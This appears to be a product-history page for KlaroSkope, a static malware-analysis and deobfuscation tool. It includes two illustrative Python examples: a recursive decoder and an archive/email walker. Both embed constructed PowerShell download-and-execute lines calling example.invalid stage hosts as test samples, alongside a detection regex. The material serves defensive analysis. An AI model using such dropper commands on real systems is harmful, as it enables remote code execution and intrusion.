Built for Defenders.
The story behind KlaroSkope,
and why static analysis is now fast again.
For years, static analysis meant the same thing: open a handful of tools, copy and paste between them, decode layer by layer, chase your own tail through obfuscation stacks, and try to remember what raw binary data or an inflate stream is supposed to look like.
The tools to solve this were there (they still are), and static analysis has been around for decades. The problem was never the absence of tools; it was that none of them could keep up with the fast-paced rhythm of an incident taking place right then and there.
Multilayered obfuscation added insult to injury: now each layer meant another tool, another manual step, another round of copy-pasting between environments. In the hands of the most experienced analysts, it was still slow. In the hands of anyone else, it was a lottery.
What if it could be measured in seconds, not hours?
Over time, static analysis quietly lost its place in SOC workflows. During live incidents, the window for actionable intelligence is measured in minutes. Static analysis couldn't meet that bar, so it got pushed to forensics, to post-mortems, to the reports written days after the damage was done. By then, the intelligence was history, and the report turned into an addendum to the Lessons Learned.
I built KlaroSkope because that didn't have to be true, and I wished for something that would give back all the time this has taken analysts. Multilayered obfuscation can be a solved problem if recursion can be automated. The half-day workflow could become seconds, and static analysis is fast again. Lightning fast, in fact. Fast enough for mid-incident response. Fast enough, sometimes, to get ahead of the threat entirely, with the added bonus of no detonation, no sandbox, no risk of executing something you don't yet understand. You analyse the weapon before it detonates, and while it doesn't "know" it's being analysed.
I started this project because while working in the SOC I kept thinking: what if such a tool existed? Something that could be fed artefacts, obfuscated scripts, and within seconds could automagically resolve everything straight into YARA and Sigma rules. Then I could attach the report and fire it off in an email within minutes of having a verdict. Wouldn't that be neat?
And so the story begins.
The Beginning
The first version did what no single tool had done before in one workflow: drop an obfuscated script, receive a YARA rule, a Sigma rule, a MITRE ATT&CK mapping, and a full report. Automatically. In seconds. Built from a SOC analyst’s frustration, not a product roadmap.
Compression, XOR, and the First Quality Gate
Support for compressed payloads and multi-byte XOR chains. The engine learns to stop when it has found the answer, not just when it has exhausted all options. A quality regression system prevents over-decoding and garbage output: a layer that only makes the data less readable is rejected rather than passed down the chain.
APT-Grade Deobfuscation
The engine expands from common script encodings to APT-grade compression formats used by real threat actors. A dedicated test suite based on documented campaign techniques begins. The shift from “script decoder” to “threat analysis engine.”
Intelligence Built In
An OSINT-derived key database brings known malware encryption keys into the pipeline automatically. Cipher identification runs without any analyst input. When the engine encounters an encrypted payload, it checks against documented keys tied to specific threat actors, decrypts if a match is found, and continues the analysis chain. No lookup. No manual effort.
Six Languages, One Engine
What started as a PowerShell decoder now handles six scripting languages in a single recursive pipeline: PowerShell, JavaScript, VBScript, PHP, Python, and Batch. Each language has its own obfuscation idioms, its own encoding tricks, its own evasion patterns. The engine resolves all of them the same way: layer by layer, automatically, with no analyst input required.
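To make the "Compression, XOR, and the First Quality Gate" and "Six Languages, One Engine" milestones concrete, here is an added example of a recursive layer-peeler with those two guards: it stops as soon as a layer looks like the answer, and it backtracks out of any layer that never leads to one. This is illustration code written for this page, not KlaroSkope's engine; the "known key" database, the key-to-actor attribution, the resolved-script tokens and the sample script are all constructed, and the multi-byte XOR key recovery is the standard per-stripe frequency scoring rather than whatever the product does.

```python
"""Added example, not KlaroSkope's code: a recursive layer-peeler with the two
guards described above (stop as soon as the answer is found, discard a layer
that never leads anywhere). Keys, samples and attributions are constructed."""
import base64
import binascii
import re
import string
import zlib
from itertools import cycle

PRINTABLE = set(string.printable.encode())
COMMON = set(b"etaoinshrdlu ")          # most frequent bytes in English/script text
# Stand-in for the OSINT key database: a constructed key with a made-up attribution.
KNOWN_XOR_KEYS = {b"\x13\x37\xc0": "demo-actor (constructed)"}
RESOLVED_TOKENS = re.compile(rb"https?://|\bIEX\b|Invoke-\w+|DownloadString|WScript\.|eval\(|cmd\.exe")
# Constructed artefact payload; not a real sample.
SAMPLE_SCRIPT = b"$u = 'http://example.invalid/stage2'; $c = New-Object Net.WebClient; IEX $c.DownloadString($u)"


def printable_ratio(buf: bytes) -> float:
    """Gate metric: share of printable ASCII bytes."""
    return sum(b in PRINTABLE for b in buf) / len(buf) if buf else 0.0


def text_score(buf: bytes) -> float:
    """Ranking metric for XOR key recovery: rewards frequent letters and spaces."""
    total = 0.0
    for b in buf:
        if b in COMMON:
            total += 1.0
        elif 0x61 <= b <= 0x7A:
            total += 0.7
        elif 0x30 <= b <= 0x39 or 0x41 <= b <= 0x5A:
            total += 0.5
        elif b in PRINTABLE:
            total += 0.2
    return total / len(buf) if buf else 0.0


def looks_resolved(buf: bytes) -> bool:
    """Stop condition: readable text with whitespace that contains script/IOC tokens."""
    return printable_ratio(buf) >= 0.95 and b" " in buf and RESOLVED_TOKENS.search(buf) is not None


def xor(buf: bytes, key: bytes) -> bytes:
    return bytes(b ^ k for b, k in zip(buf, cycle(key)))


def recover_xor_key(buf: bytes, klen: int) -> bytes:
    """Pick each key byte independently on its stripe buf[i::klen] by text_score."""
    return bytes(
        max(range(256), key=lambda k: text_score(bytes(b ^ k for b in buf[i::klen])))
        for i in range(klen)
    )


def try_base64(buf: bytes):
    s = b"".join(buf.split())
    if len(s) < 16 or not re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        out = base64.b64decode(s, validate=True)
    except binascii.Error:
        return None
    # PowerShell -EncodedCommand is UTF-16LE: fold it back to single-byte text.
    if len(out) >= 4 and not any(out[1::2]):
        out = out.decode("utf-16-le", "ignore").encode("latin-1", "ignore")
    return out


def try_inflate(buf: bytes):
    for wbits in (zlib.MAX_WBITS, zlib.MAX_WBITS | 16, -zlib.MAX_WBITS):  # zlib, gzip, raw deflate
        try:
            return zlib.decompress(buf, wbits)
        except zlib.error:
            continue
    return None


def try_xor(buf: bytes):
    """Documented keys first (the key-database path), then short-key recovery."""
    candidates = [xor(buf, key) for key in KNOWN_XOR_KEYS]
    candidates += [xor(buf, recover_xor_key(buf, klen)) for klen in range(1, 5)]
    best = max(candidates, key=lambda c: (printable_ratio(c), text_score(c)))
    return best if best != buf and printable_ratio(best) >= 0.95 else None


DECODERS = (("base64", try_base64), ("inflate", try_inflate), ("xor", try_xor))


def deobfuscate(buf: bytes, max_depth: int = 8):
    """Depth-first peel. Returns (resolved_bytes, [(layer, output), ...]) or None.
    The first resolved layer is the answer (no over-decoding); a branch that never
    resolves is backtracked and dropped (no garbage output)."""
    if looks_resolved(buf):
        return buf, []
    if max_depth == 0:
        return None
    for name, fn in DECODERS:
        out = fn(buf)
        if out is None or out == buf:
            continue
        deeper = deobfuscate(out, max_depth - 1)
        if deeper is not None:
            return deeper[0], [(name, out)] + deeper[1]
    return None


def build_sample() -> bytes:
    """Constructed chain: script -> XOR with the 'known' key -> zlib -> base64."""
    return base64.b64encode(zlib.compress(xor(SAMPLE_SCRIPT, b"\x13\x37\xc0")))


if __name__ == "__main__":
    final, chain = deobfuscate(build_sample())
    print(" -> ".join(name for name, _ in chain))   # base64 -> inflate -> xor
    print(final.decode())
```

The chain list is what an analyst-facing report would render: each entry records which decoder fired and what it produced, so every IOC in the final text can be traced back to the layer that revealed it. The same loop handles a script XOR'd with a key that is not in the database, because key recovery falls back to per-stripe scoring; readable text that contains no script tokens is left alone and returns None instead of being "decoded" into garbage.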
Every Obfuscation Has a Decoder
Invisible Unicode obfuscation. Zero-width character encoding used by documented campaigns in the wild. Esoteric JavaScript formats including JSFuck, JJEncode, and AAEncode. Bash ANSI-C quoting. VBScript Chr() chains. Python exec chains. Batch caret escapes. By this point the engine covers 100% of documented real-world obfuscation chains across all six supported languages.
Hidden Payloads in Images
Steganography extraction engine. Twelve techniques covering the majority of documented in-the-wild image steganography. Isolated container for untrusted image parsing. A PNG dropped into the platform now yields IOCs, YARA rules, and a report if a payload is hiding inside it.
Browser Extensions: An Overlooked Attack Surface
CRX and XPI files analysed as first-class artefacts. Manifest permissions classified by risk level. Obfuscated JavaScript extracted and run through the full deobfuscation pipeline. Steganographic payloads inside extension images detected. An attack vector that most organisations cannot inspect at all, handled automatically.
Encrypted Stego Payloads Decrypted
After extracting a hidden payload, the engine now attempts to decrypt it. Key material is pulled from EXIF metadata, PNG private chunks, and an OSINT database of known malware encryption keys with threat actor attribution. The chain extends: image to payload to decrypted content to deobfuscated script to IOCs.
Analyst View: Context Preserved
The most analytically significant feature in the platform. Traditional deobfuscation tools show you the final extracted value. Analyst View shows you the last moment the entire script was still readable, before extraction stripped context away. Every obfuscation resolution is marked inline. Every IOC shows which decode layer revealed it. The analyst sees the weapon in its original shape, not just its payload.
VBA Macro Obfuscation, Solved
A dedicated VBA function resolver handles macro obfuscation techniques used by Emotet, QakBot, Dridex, and AgentTesla across hundreds of known variants. The same recursion principle: each layer resolved in-place, context preserved, result clean.
PDF Documents: Every Trick Exposed
Full PDF document analysis. Embedded JavaScript extraction, URL harvesting, form action detection, and phishing kit identification. Recursive object parsing handles the nested structures that attackers use to hide payloads. A PDF dropped into the platform now yields every IOC, every embedded script, and every suspicious action without opening it.
Office Documents: Every Format Handled
Full analysis of Microsoft Office documents across all container formats. VBA macro extraction with VBA stomping detection. Template injection. DDE command extraction. XLM macro analysis. Embedded file handling. RTF objects. OneNote embedded scripts. The engine now reads what analysts call “malicious documents.”
Email Analysis
EML and MSG files analysed recursively. Attachments dispatched to the correct engine automatically. Authentication headers parsed. The full phishing delivery chain from email to attachment to script to payload resolved in a single drop.
Archive Analysis and the Matryoshka
Archive files of all major formats. Password-protected archives attempted against known malware passwords automatically. Extraction, analysis, and result merging across nested content. A single ZIP drop can now contain a .eml, containing an Office document, containing an embedded image, containing a stego payload, containing an encrypted script. Every layer analysed. Every IOC extracted. Every rule generated. In under a minute.
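The "Email Analysis" and "Archive Analysis and the Matryoshka" milestones both come down to one mechanism: sniff the artefact's type, unpack it, recurse into whatever falls out, and merge the findings. The following added example shows that walker end to end on a constructed ZIP that holds an EML whose attachment is a one-line dropper. It is illustration code written for this page, not KlaroSkope's dispatcher; the password list, the header sniffing rule and the sample mail are all made up for the demo, and only three artefact kinds are handled.

```python
"""Added example, not KlaroSkope's code: a recursive container walker that sniffs
each artefact's type, unpacks it and recurses, merging findings into one list.
The ZIP -> EML -> attachment chain and the password list are constructed."""
import io
import re
import zipfile
from email import message_from_bytes
from email.message import EmailMessage

URL_RE = re.compile(rb"https?://[^\s'\"<>)]+")
HEADER_RE = re.compile(rb"(?i)^(From|Received|Return-Path|Subject|Date|MIME-Version|Content-Type):")
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)")
# Constructed list standing in for "known malware passwords"; None tries the plain archive first.
KNOWN_ARCHIVE_PASSWORDS = [None, b"infected", b"malware"]


def sniff(data: bytes) -> str:
    """Cheap content sniffing; a real dispatcher would check many more magics."""
    if data[:2] == b"PK":
        return "zip"
    if HEADER_RE.match(data):
        return "eml"
    return "script"


def read_member(zf: zipfile.ZipFile, info: zipfile.ZipInfo):
    """Try each documented password in turn; None if the archive stays locked."""
    for pwd in KNOWN_ARCHIVE_PASSWORDS:
        try:
            return zf.read(info, pwd=pwd)
        except RuntimeError:        # wrong password, or password required
            continue
    return None


def walk(data: bytes, path: str = "artefact", depth: int = 0, max_depth: int = 10) -> list:
    """Returns [(path, kind, findings)] for every leaf reached inside `data`."""
    if depth >= max_depth:
        return [(path, "skipped", ["max nesting depth reached"])]
    kind = sniff(data)
    results = []
    if kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                member = read_member(zf, info)
                child = f"{path}/{info.filename}"
                if member is None:
                    results.append((child, "zip-member", ["encrypted, no known password"]))
                else:
                    results += walk(member, child, depth + 1, max_depth)
    elif kind == "eml":
        msg = message_from_bytes(data)
        auth = msg.get("Authentication-Results", "")
        results.append((path, "eml", [f"{k}={v}" for k, v in AUTH_RE.findall(auth)]))
        for part in msg.walk():
            if part.get_content_disposition() == "attachment":
                child = f"{path}/{part.get_filename()}"
                results += walk(part.get_payload(decode=True), child, depth + 1, max_depth)
    else:
        urls = sorted({m.decode() for m in URL_RE.findall(data)})
        results.append((path, "script", urls))
    return results


def build_sample() -> bytes:
    """Constructed artefact: a ZIP holding an EML whose attachment is a one-line dropper."""
    script = (b"powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
              b".DownloadString('http://stage.example.invalid/a.ps1')\"")
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Invoice"
    msg["Authentication-Results"] = "mx.example.invalid; spf=fail smtp.mailfrom=example.invalid"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(script, maintype="application", subtype="octet-stream", filename="invoice.bat")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mail/invoice.eml", msg.as_bytes())
        zf.writestr("readme.txt", b"nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for path, kind, found in walk(build_sample()):
        print(f"{kind:10} {path}: {found}")
```

Two design points carry over to any real implementation: the depth cap is the defence against archive bombs and self-referencing containers, and every finding keeps the full nested path (archive member, then attachment name) so the report can say exactly where in the Matryoshka each IOC was found rather than flattening everything into one anonymous list.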
Surgical Precision
Resolution highlighting that shows, inline, exactly what each obfuscation layer decoded to. Report deduplication that collapses repeated analysis across nested content. The output is clean, precise, and ready to attach to an email within minutes of the artefact landing in the queue.
The story continues.
None of this happened in isolation. From the very first version, KlaroSkope has been shaped by security professionals who tested it, challenged it, and pushed it forward with real-world feedback. Every milestone on this timeline carries their fingerprints.
